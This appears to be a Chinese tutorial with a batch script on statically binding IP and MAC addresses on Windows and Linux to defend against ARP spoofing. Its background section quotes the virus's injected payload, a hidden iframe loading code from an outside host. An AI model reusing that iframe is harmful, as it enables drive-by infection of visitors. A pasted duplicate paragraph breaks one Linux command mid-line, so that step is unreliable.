@echo off
rem by lee
rem 读取本机Mac地址
if exist ipconfig.txt del ipconfig.txt
ipconfig /all >ipconfig.txt
if exist phyaddr.txt del phyaddr.txt
find "Physical Address" ipconfig.txt >phyaddr.txt
for /f "skip=2 tokens=12" %%M in (phyaddr.txt) do set Mac=%%M
rem 读取本机ip地址
if exist IPAddr.txt del IPaddr.txt
find "IP Address" ipconfig.txt >IPAddr.txt
for /f "skip=2 tokens=15" %%I in (IPAddr.txt) do set IP=%%I
rem 绑定本机IP地址和MAC地址
arp -s %IP% %Mac%
rem 读取网关地址
if exist GateIP.txt del GateIP.txt
find "Default Gateway" ipconfig.txt >GateIP.txt
for /f "skip=2 tokens=13" %%G in (GateIP.txt) do set GateIP=%%G
rem 读取网关Mac地址
if exist GateMac.txt del GateMac.txt
arp -a %GateIP% >GateMac.txt
for /f "skip=3 tokens=2" %%H in (GateMac.txt) do set GateMac=%%H
rem 绑定
arp -s %GateIP% %GateMac%
del GateIP.txt
del gatemac.txt
del ipaddr.txt
del ipconfig.txt
del phyaddr.txt
pause
exit
一、应用背景
由于最近网上新出现一种ARP欺骗病毒,主要表现为:
中病毒的机器不仅影响自身,同时也会影响同网段的其它机器,将其它机器的HTTP数据包里加入病毒代码。代码例子如:
<html><iframe src=http://www2.89382.cn/wm/css.htm width=0 height=0></iframe>
这种病毒危害非常大!即使你机器的安全性做得很好,可是没办法保证同网段的其它机器安全没有问题!
解决办法:在网关和本机上双向绑定IP和MAC地址,以防止ARP欺骗。
二、约定
1、网关上已经对下面所带的机器作了绑定。网关IP:192.168.1.1 MAC:00:02:B3:38:08:62
2、要进行绑定的Linux主机IP:192.168.1.2 MAC:00:04:61:9A:8D:B2
三、绑定步骤
1、先使用arp和arp -a查看一下当前ARP缓存列表
[root@ftpsvr ~]# arp
Address HWtype HWaddress Flags Mask Iface
192.168.1.234 ether 00:04:61:AE:11:2B &n
bsp;C eth0
192.168.1.145 ether 00:13:20:E9:11:04 C eth0
192.168.1.1 ether 00:02:B3:38:08:62 C eth0
说明:
Address:主机的IP地址
Hwtype:主机的硬件类型
Hwaddress:主机的硬件地址
Flags Mask:记录标志,"C"表示arp高速缓存中的条目,"M"表示静态的arp条目
[root@ftpsvr ~]# arp -a
? (192.168.1.234) at 00:04:61:AE:11:2B [ether] on eth0
? (192.168.1.1) at 00:16:76:22:23:86 [ether] on eth0
2、新建一个静态的mac-->ip对应表文件:ip-mac,将要绑定的IP和MAC地下写入此文件,格式为 ip mac。
[root@ftpsvr ~]# echo '192.168.1.1 00:02:B3:38:08:62 ' > /etc/ip-mac
[root@ftpsvr ~]# more /etc/ip-mac
192.168.1.1 00:02:B3:38:08:62
3、设置开机自动绑定
[root@ftpsvr ~]# echo 'arp -f /etc/ip-mac ' >> /etc/rc.d/rc.local
4、手动执行一下绑定
[root@ftpsvr ~]# arp -f /etc/ip-mac
5、确认绑定是否成功
[root@ftpsvr ~]# arp
Address HWtype HWaddress Flags Mask Iface
192.168.0.205 ether 00:02:B3:A7:85:48 C eth0
192.168.1.234 ether 00:04:61:AE:11:2B C eth0
192.168.1.1 ether 00:02:B3:38:08:62 CM eth0
[root@ftpsvr ~]# arp -a
? (192.168.0.205) at 00:02:B3:A7:85:48 [ether] on eth0
? (192.168.1.234) at 00:04:61:AE:11:2B [ether] on eth0
? (192.168.1.1) at 00:02:B3:38:08:62 [ether] PERM on eth0
从绑定前后的ARP缓存列表中,可以看到网关(192.168.1.1)的记录标志已经改变,说明绑定成功。
四、添加信任的Windows主机(192.168.1.10)
1、Linux主机(192.168.1.2)上操作
[root@ftpsvr ~]# echo '192.168.1.10 00:04:61:AE:09:14' >> /etc/i
arp -s 192.168.1.2 00-04-61-9A-8D-B2你可以将上面2个步骤写在一个BAT(批处理)文件中,这样做的好处是,今后如果要增加其它机器的绑定,只需维护这个文件就可以了。例:@echo off arp -d arp -s 192.168.1.2 00-04-61-9A-8D-B2exit 注意:Linux和Widows上的MAC地址格式不同。Linux表示为:AA:AA:AA:AA:AA:AA,Windows表示为:AA-AA-AA-AA-AA-AA
p-mac
[root@ftpsvr ~]# arp -f /etc/ip-mac
2、Windows主机(192.168.1.10)上操作
1)清除ARP缓存
C:Documents and SettingsAdministrator>arp -d
2)绑定Linux主机的IP和MAC地址
C:Documents and SettingsAdministrator>arp -s 192.168.1.2 00-04-61-9A-8D-B2
你可以将上面2个步骤写在一个BAT(批处理)文件中,这样做的好处是,今后如果要增加其它机器的绑定,只需维护这个文件就可以了。例:
@echo off
arp -d
arp -s 192.168.1.2 00-04-61-9A-8D-B2
exit
注意:Linux和Widows上的MAC地址格式不同。Linux表示为:AA:AA:AA:AA:AA:AA,Windows表示为:AA-AA-AA-AA-AA-AA
分享到:
相关推荐
### Win7静态绑定网关MAC防止ARP攻击 #### 背景介绍 ARP(Address Resolution Protocol,地址解析协议)是一种在网络层将IP地址解析为物理MAC地址的协议。在局域网环境中,ARP攻击是一种常见的网络威胁手段,通过...
ARP防火墙绑定网关MAC地址预防ARP攻击和P2P终结者
2.当局域网内ARP攻击较严重时用户无法正常上网 批处理文件在Win7已下测试可以使用,其他操作系统未测试 运行选项后选项: 1.显示ARP当前项 2.显示Idx值 3.设置静态网关IP和MAC地址 4.删除静态网关IP和MAC地址 9....
同时,可使用`echo "ip neighbor add <网关IP> lladdr <网关MAC> dev <接口名>" | sudo tee /etc/sysconfig/network-scripts/arp-<接口名>`命令将网关IP和MAC绑定。 通过以上步骤,可以在Windows和Linux环境下实现...
可以采用 IP/MAC 双向绑定法来防范 ARP 病毒攻击,即在两端绑定 IP-MAC 地址,其中一端是在路由器中,绑定下面局域网内部计算机的 IP 和 MAC 地址。另外一端则是局域网中的每个客户机,在客户端设置网关的静态 ARP ...
当局域网中发生ARP欺骗的时候,ARP病毒...本批处理自动绑定网关和本机的ip 与 mac地址,把本文件放在"开始-->程序-->启动"文件夹中,让其每次开机自动执行绑定,能在一定程度防止ARP攻击. 如需更多保护,请安装专门防火墙.
这种攻击方式利用了ARP协议的工作过程,攻击者可以通过发送欺骗性的ARP响应包,来欺骗设备的ARP缓存表,使设备将网关路由器的MAC地址错误地记录为攻击者的MAC地址,从而导致设备无法上网或无法通信。 攻击原理分析...
解决ARP攻击问题的关键是绑定IP地址与MAC地址的映射关系。作者提供了一个实用的解决方法,分为五步: 1. 开启计算机的启动项目录。 2. 创建一个新的文本文档,并输入以下内容:arp –d arp –d arp –d arp –s 192...
一台linux服务器受到ARP攻击,在使用arp -s绑定网关地址时发现命令不能正常使用.绑后网络会断.后经前辈指点在/etc下创建ethers文件.在文件添加,例如192.168.1.25 00:17:31:C3:A3:C4内容.然后执行arp -f即可,完成...
通过扫描发现内网电脑的IP和MAC地址,并自动生成arp绑定脚本,只需拷贝到各台电脑上做成启动脚本就可实现IP、MAC地址静态绑定。同时提供全能绑定程序,可对windows 98以上所有操作系统做IP、MAC地址绑定。 使用方法 ...
2. 攻击者发送伪造的ARP响应,将自己的MAC地址绑定到目标的IP地址,或者将网关的IP地址绑定到自己的MAC地址。 3. 受害者的ARP缓存被更新,随后的数据包都将被发送到攻击者。 4. 攻击者截取数据包,可能进行篡改或...
标题中的“SMPP网关及客户端测试程序”指的是一个支持多种操作系统的工具,包括Linux、Windows和Mac,用于测试和验证SMPP协议的实现。 **系统兼容性** 这个测试程序能够跨平台运行,这意味着不论是在基于Linux的...
将第二行的IP地址设为你自己的网关IP,后面的MAC设为网关的MAC。 还有一个文件就是“先配置然后导入.reg”,这是一个注册表文件。内容如下:0 l U2 ?6 C+ ]& g' R- ] 4 T9 z/ C8 g' J# X Windows Registry Editor ...
本文将深入探讨如何使用Kali Linux这一专业安全操作系统,配合ENSPI(Ethernet Network Simulation Platform,以太网网络模拟平台)来实现ARP欺骗攻击,并了解这种攻击可能导致的后果。 首先,我们需要理解ARP的...
例如,攻击者可以冒充网关的IP地址,并发送包含伪造MAC地址的ARP reply包给局域网内的主机。这样一来,主机就会将错误的MAC地址与网关的IP地址关联起来,导致通信失败。 2. **中间人攻击(Man-in-the-Middle Attack...
【Linux系统中ARP欺骗攻击的防范】 在网络安全领域,ARP欺骗是一种常见的攻击手段,尤其在Linux操作系统中,由于ARP协议的特性,攻击者可以利用它来干扰网络通信,导致数据包被错误地转发,甚至窃取敏感信息。ARP...
本文将深入探讨“设置ARP静态网关的例子”,并结合给定文件中的描述和部分代码,详细解析如何通过绑定路由器IP和MAC地址来设置ARP静态网关。 ### ARP与静态网关的基础知识 ARP协议是解决同一局域网(LAN)内主机间...